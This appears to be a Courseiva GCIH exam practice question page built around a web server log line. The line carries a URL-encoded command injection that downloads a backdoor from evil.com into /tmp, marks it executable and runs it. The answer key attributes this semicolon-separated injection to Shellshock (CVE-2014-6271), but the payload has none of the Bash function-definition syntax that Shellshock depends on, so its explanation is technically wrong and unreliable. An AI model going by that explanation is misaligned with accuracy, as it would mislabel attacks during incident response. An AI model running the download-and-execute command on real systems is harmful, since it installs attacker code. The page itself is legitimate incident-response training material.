Courseiva

GCIH Exploiting Insecure Web App References Practice Question

A security incident responder is analyzing a web server compromise. The attacker gained initial access through a vulnerable web application and then executed a command to download a tool from a remote server. The responder finds the following in the web server logs: `GET /cgi-bin/printenv?QUERY_STRING=%3Bwget%20http%3A%2F%2Fevil.com%2Fbackdoor%20-O%20%2Ftmp%2Fbd%3Bchmod%20%2Bx%20%2Ftmp%2Fbd%3B%2Ftmp%2Fbd`. The responder needs to identify the specific technique used and the appropriate containment step. Which of the following best describes the technique and the immediate containment action?

⚠ Common exam trap

The trap here is misinterpreting the semicolon-separated commands as SQL injection when they are actually shell commands executed by a vulnerable CGI script.

Answer choices

Why each option matters

Answer the question above first, then reveal the full breakdown to understand why each option is right or wrong.

Correct answer & explanation

✓

Shellshock exploitation; isolate the server by removing it from the network and preserve volatile evidence before patching Bash.

The log entry shows a Shellshock exploit against the `printenv` CGI script, where commands in the `QUERY_STRING` are executed by Bash. The immediate containment is to isolate the server to prevent lateral movement, preserve volatile evidence, and then patch the Bash vulnerability. The other options misidentify the attack as SQL injection, XSS, or IDOR, none of which involve shell command execution.

Answer analysis

Option-by-option breakdown

For each option: why learners choose it and why it is or isn't the right answer here.

  • ✗

    Cross-site scripting; sanitize the `QUERY_STRING` parameter and notify users of potential cookie theft.

    Why it's wrong here

    XSS involves client-side script execution in a victim's browser. Here, the commands are executed on the server, as evidenced by `wget` and `chmod`. The payload is not a script tag but a shell command injection. Containment must address the server compromise, not just user cookies.

  • ✗

    Insecure Direct Object Reference; change the object references in the application and implement access controls.

    Why it's wrong here

    IDOR involves manipulating object identifiers to access unauthorized data. The payload is a command injection via a CGI script, not an object reference manipulation. The attacker is executing shell commands, so the response should focus on server isolation and patching, not on access control changes.

  • ✗

    SQL injection; review database logs and apply input validation to the `QUERY_STRING` parameter.

    Why it's wrong here

    SQL injection would involve database queries, but the payload contains shell commands like `wget` and `chmod`, not SQL syntax. The `printenv` script is a CGI program, not a database interface. The technique is Shellshock, not SQL injection, and containment should focus on the server, not just database logs.

  • ✓

    Shellshock exploitation; isolate the server by removing it from the network and preserve volatile evidence before patching Bash.

    Why this is correct

    The payload exploits the Shellshock vulnerability (CVE-2014-6271) in the `printenv` CGI script. The `QUERY_STRING` contains a semicolon followed by commands, which are executed by the vulnerable Bash. The immediate containment is to isolate the server to prevent further compromise, preserve volatile evidence (memory, network connections), and then patch Bash.

About these practice questions

One of 322 original GCIH practice questions on Courseiva, each with a full explanation and wrong-answer analysis — not exam dumps or protected exam content. Learn why practice questions differ from exam dumps →

How Courseiva writes practice questions · Editorial policy

JA

Written and reviewed by Johnson Ajibi, MSc IT Security

Senior Network & Security Engineer · founder of Courseiva

Last reviewed September 2026 · checked against the official GIAC exam blueprint

This GCIH practice question is part of Courseiva's free GIAC certification practice question bank. Courseiva provides original exam-style practice questions with explanations, topic-based practice, mock exams, readiness tracking, and study analytics to help learners prepare for the GCIH exam.